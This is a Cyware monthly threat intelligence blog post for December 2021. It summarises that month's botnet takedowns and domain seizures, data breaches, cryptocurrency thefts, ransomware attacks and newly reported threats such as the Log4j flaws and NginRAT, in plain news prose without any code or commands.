Go to listing page

Cyware Monthly Threat Intelligence, December 2021

Cyware Monthly Threat Intelligence, December 2021

Share Blog Post

The Good

Welcome to the new year, folks! The last month was terrific with multiple successful crackdown efforts against cybercriminals. Microsoft confiscated 42 domains pertaining to a Chinese espionage group, whereas the data of 300 million citizens of the U.S., Ukraine, and Europe was recovered from 51 dark market traders. Also, two U.S. universities pledged to address the dearth of cybersecurity talent.

  • Google’s TAG dismantled the Glupteba botnet, which compromised around 1 million Windows and IoT devices. The blockchain-enabled botnet grows at the pace of thousands of new devices every day and propagates via malicious documents, fake YouTube videos, fake pirate software, and traffic distribution systems, among others. TAG terminated 63 million Google docs, 1,313 Google accounts, 908 cloud projects, and 870 Google Ads accounts.  
  • Microsoft seized 42 domains used by Chinese cyberespionage group Nickel, aka APT15, to harvest intelligence on foreign ministries, human rights organizations, and think tanks. Also, the Ukrainian police arrested 51 suspects allegedly trading stolen personal data of hundreds of millions of individuals worldwide in underground marketplaces. On a similar line, the Europol, FBI, and Romanian National Police allegedly detained a top ransomware affiliate
  • The CISA’s new Binding Operational Directive (BOD) necessitated federal agencies to patch almost 300 known vulnerabilities. The directive is applicable for all hardware and software on both internet- and non-internet-facing systems. The BOD establishes that agencies have two weeks to close bugs disclosed this year and six months for older ones, some even dating back to 2014.  
  • Iowa State University joined hands with the University of Illinois to lead a coalition of industry and government partners to develop cybersecurity talent in the Midwestern U.S. Dubbed ReCIPE, the coalition has received a two-year grant funding of $2 million from the NSA.

The Bad

There was a barrage of attacks against cryptocurrency firms last month. In one of the incidents, a blockchain gaming firm lost $135 million to attackers in its third cyberattack within a year. It was rather poor for thousands of unsuspecting customers of LINE Pay organizations who were impacted in a breach. Meanwhile, the FBI disclosed that Cuba ransomware actors were behind the attacks on at least 49 critical infrastructure organizations. 

  • Users of the blockchain gaming company Vulcan Forged have been affected by a hacking incident. Following the attack, the attackers made away with around $135 million in cryptocurrency. They stole the private keys to access 96 wallets. This is the third crypto theft the company suffered in the past 11 months.
  • Régie Autonome des Transports Parisiens (RATP), a state-owned French transportation company, inadvertently leaked the data of almost 60,000 employees due to an unsecured HTTP server. The exposed records included employees’ full names, email addresses, logins, and MD5-hashed passwords. The server also contained source code related to RATP’s employee benefits portal.
  • Mobile payment provider LINE Pay disclosed a breach wherein around 133,000 users’ payment details were mistakenly published on GitHub for around three months between September and November. The leaked data included the date, time, and amount of transactions, as well as user and franchise store identification numbers. 
  • Multiple Iranian media and social networks have fallen victim to an ongoing SMS phishing campaign that masqueraded Iranian government services. The smishing campaign relies on social engineering to trick victims into giving up their credit card details. Besides gaining payment card details, the malicious applications were used to gain access to 2FA authentication SMS and turn the victim device into a bot. 
  • The Los Angeles branch of Planned Parenthood suffered a data breach that affected the personal details of 400,000 patients. The incident occurred in October after a hacker installed malware and exfiltrated personal details related to patients. While the attack involved ransomware, the group did not confirm paying any ransom.
  • Hackers stole over $120 million from multiple cryptocurrency wallets linked to the BadgerDAO DeFi platform. The hackers stole more than 2,100 Bitcoins and 151 Ethercoins from Badger user accounts. In addition to this, a lone user lost more than 900 BTC, amounting to $51 million. As Badger continues investigating the hack, it has paused all smart contracts to stop further withdrawals.
  • Convenience store chain SPAR was forced to close some of its stores in the U.K after a cyberattack on its IT systems, including staff email accounts. Out of its nearly 2,600 stores located across the U.K, 330 SPAR shops in northern England were crippled. The affected stores were unable to process payments made using credit or debit cards. While some stores have reopened, they are only accepting cash payments.
  • In a new notice, the FBI reported that the Cuba ransomware group has attacked 49 organizations across five critical infrastructure sectors and collected around $44 million in ransom payments. The group is believed to be targeting the financial, government, healthcare, manufacturing, and information technology sectors while using the Hancitor malware to gain entry to Windows systems.
  • A fake Android app disguised as a housekeeping service was used to steal online banking credentials from the customers of eight Malaysian banks. The app, dubbed Cleaning Service Malaysia, was promoted through fake websites and social media accounts. Some of the victims include Maybank, RHB, Public Bank, and BSN.
  • Crypto trading platform Bitmart suffered a breach wherein the hackers apparently withdrew tens of millions of dollars worth of cryptocurrency assets from one of its hot wallets. Bitmart confirmed the hack and said that the stolen assets amounted to about $196 million in value.
  • The Oregon Anesthesiology Group (OAG) disclosed a ransomware attack that occurred in July. The breach affected the information of 750,000 patients and 522 current and former employees. The attack was likely launched by the HelloKitty ransomware group. The FBI assessed that the attackers abused a flaw in OAG’s third-party firewall. 
  • Tens of thousands of people were temporarily locked out of their Australian Taxation Office (ATO) online accounts following a ransomware attack on Frontier Software last month. While around 38,000 people had their data stolen, experts believe that further 42,000 sensitive records might also have been stolen.

New Threats

December 2021 ended with a critical flaw in Log4j, which attracted millions of cyberattack attempts per hour by cybercriminals. Additionally, a new ransomware family and new spyware emerged in the cyber landscape. What more? Cyber adversaries were spotted working on scams around the new Omicron threat.

  • A series of flaws affecting multiple Log4j versions were found by researchers. One of the flaws, for which technical details are yet to be disclosed, can be exploited to exfiltrate sensitive data in certain circumstances. Multiple threat actor groups, including Conti, were found targeting it.
  • The Dark Mirai-based botnet campaign, also referred to as MANGA, is targeting a vulnerability in TP-Link Home Wireless Routers, particularly the TL-WR840N EU (V5) model. The flaw is tracked as CVE-2021-41653. MANGA is capitalizing on the gap between the time of vulnerability disclosure and the application of the patch.
  • Researchers discovered a new ransomware family that has adopted the Cerber name previously used by different ransomware dating back to 2016. The new Cerber version targets Atlassian Confluence and GitLab servers by exploiting remote code execution vulnerabilities.
  • Emotet is now distributed via malicious Windows App Installer packages that pretend to be Adobe PDF software. This new campaign begins with stolen reply-chain emails that pretend to reply to existing conversations. Once installed, the malware steals victims’ emails to conduct spam campaigns in the future and deploy ransomware. 
  • A new strain of cryptomining malware is targeting QNAP Network-Attached Storage (NAS) devices, as per a security advisory issued by QNAP. Once the malware infects a NAS device, it creates a process named “[oom_reaper]” that eats up around 50% of the total CPU usage for cryptomining purposes. The company has urged users to update their devices’ operating systems and change all NAS account passwords. 
  • The new NginRAT hides on Ngnix servers to target eCommerce servers in Europe and North America. The RAT is being used to conduct server-side attacks to exfiltrate payment card data from online stores. The trojan was spotted in Europe and North America where eCommerce servers were already infected by CronRAT. NginRAT has compromised servers in France, the U.S., and Germany. 
  • Researchers spotted a new espionage campaign targeting telecommunications and IT service providers in the Middle East and Asia. The campaign, which has been active for six months, is associated with the SeedWorm APT group. The campaign makes use of spear-phishing emails and targets vulnerable Microsoft Exchange servers.
  • Mandiant researchers linked the new Sabbath ransomware group, which recently launched its own victim site, to another formerly active ransomware group named Arcane. The ransomware has already launched attacks against healthcare, education, and natural resources in the U.S. and Canada. It has been able to fly under the radar because of its continuous rebranding. 
  • Researchers spotted 14 new types of cross-site data leakage attacks against several web browsers, such as Mozilla Firefox, Tor browser, Google Chrome, Opera, Microsoft Edge, and Apple Safari, among others. Collectively known as XS-Leaks, these flaws allow a malicious website to pilfer personal information from its visitors while they interact with other websites in the background. 
  • Threat actors have already started exploiting the interest in the Omicron COVID-19 variant and using it as lures in a phishing campaign. The attack was detected by U.K authorities and the NHS has issued warnings. The lures are of a free Omicron PCR test that pretends to allow recipients to bypass restrictions.
  • Kaspersky unearthed PseudoManuscrypt - a new global spyware threat that has infected over 35,000 ICS computers across 195 countries. It bears similarity to Manuscrypt malware used by the Lazarus group. The malware contains sophisticated spying functionalities and has been targeting industrial control systems and government organizations across several industries. 
  • Two severe vulnerabilities affecting the ‘All in One SEO’ plugin put more than three million WordPress websites at risk of cyberattacks. The two flaws, described as a privilege escalation bug (CVE-2021-25036) and an SQL injection bug (CVE-2021-25037), were addressed with the release of a new version of the plugin.


vulcan forged
line pay
log4j flaw
badgerdao defi platform
glupteba botnet
sabbath ransomware
cuba ransomware

Posted on: January 03, 2022

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.